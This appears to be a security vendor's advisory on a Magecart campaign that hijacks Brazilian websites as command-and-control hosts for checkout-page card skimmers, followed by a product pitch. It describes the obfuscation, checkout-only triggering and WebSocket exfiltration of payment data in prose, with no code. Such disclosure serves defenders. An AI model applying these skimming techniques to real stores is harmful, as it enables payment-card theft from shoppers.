Magecart Repurposes Legitimate Brazilian Sites for C2 - July 22, 2025
Updated
SOURCE DEFENSE RESEARCH INTELLIGENCE NEWS
July 22, 2025
MAGECART REPURPOSES LEGITIMATE BRAZILIAN SITES FOR C2
The Source Defense Research Team has uncovered a covert Magecart campaign targeting Brazilian e-commerce sites. This attack demonstrates how legitimate websites can be hijacked to serve as Command and Control (C2) servers, becoming unwitting hubs for digital skimming operations.
Attack details
The attackers first compromise legitimate Brazilian websites by injecting them with malicious, multi-layer obfuscated JavaScript—encoded in base64 and hidden using techniques like String.fromCharCode(). This transforms the originally benign sites into command-and-control (C2) infrastructure for their campaigns.
With the C2 infrastructure in place, the attackers proceed to infiltrate additional Brazilian online stores. They modify first-party scripts to include hidden links pointing to the malicious code hosted on the compromised C2 sites. These altered scripts stay dormant until a user reaches the payment page—at which point they fetch and execute the skimmer script from the C2 server.
This approach offers two key advantages:
Stealth during normal use or testing, as the malicious script activates only at checkout, evading detection during casual browsing or QA reviews.
Legitimacy masking, since the skimmer is loaded from a seemingly trusted local domain—the compromised C2 server.
Once activated, the script captures payment data entered by the user and exfiltrates it to the same C2 server, confirming the attacker’s full control of the hijacked infrastructure.”
Attack highlights
First-party origin: The attack is launched from code embedded directly on the victim site—not a third-party integration—making it much harder to detect or block using CSP or third-party controls.
WebSocket exfiltration: Both delivery and data theft occur over WebSockets, which are rarely monitored by most security tools.
Previously unknown infrastructure: At the time of discovery, both clicktrack01[.]com and jartrack01[.]com had no history of malicious activity. Their inclusion in threat intelligence databases stems solely from this disclosure
How Source Defense protects from such attacks
Customers using Protect are already secure:
The Source Defense system blocks the malicious third-party script from the C2 server before it can load, regardless of its obfuscation or the legitimacy of the domain it’s hosted on.
For Detect users and incident response teams, Source Defense provides clear, actionable alerts when:
Scripts are loaded from blacklisted C2 domains
Sensitive data is sent to blacklisted destinations
Unauthorized access is made to PII input fields (e.g., name, email, phone)
These alerts are raised via:
Email notifications to those users who opted-in
The in-app bell notification center
In-app dashboard and‘Found in blacklists’ and ‘Script behaviors’ widgets after drill-down, flagged in red for high-severity issues.
Whether malicious code appears through first-party obfuscation or external C2 delivery, Source Defense ensures both proactive blocking and detailed visibility.
Summary
This campaign shows how Magecart doesn’t just attack websites—it repurposes them. A trusted domain today could be a C2 server tomorrow.
If you're not actively inspecting every script on your site—especially those that seem legitimate—you’re trusting what threat actors count on you to ignoreyou're not secure.
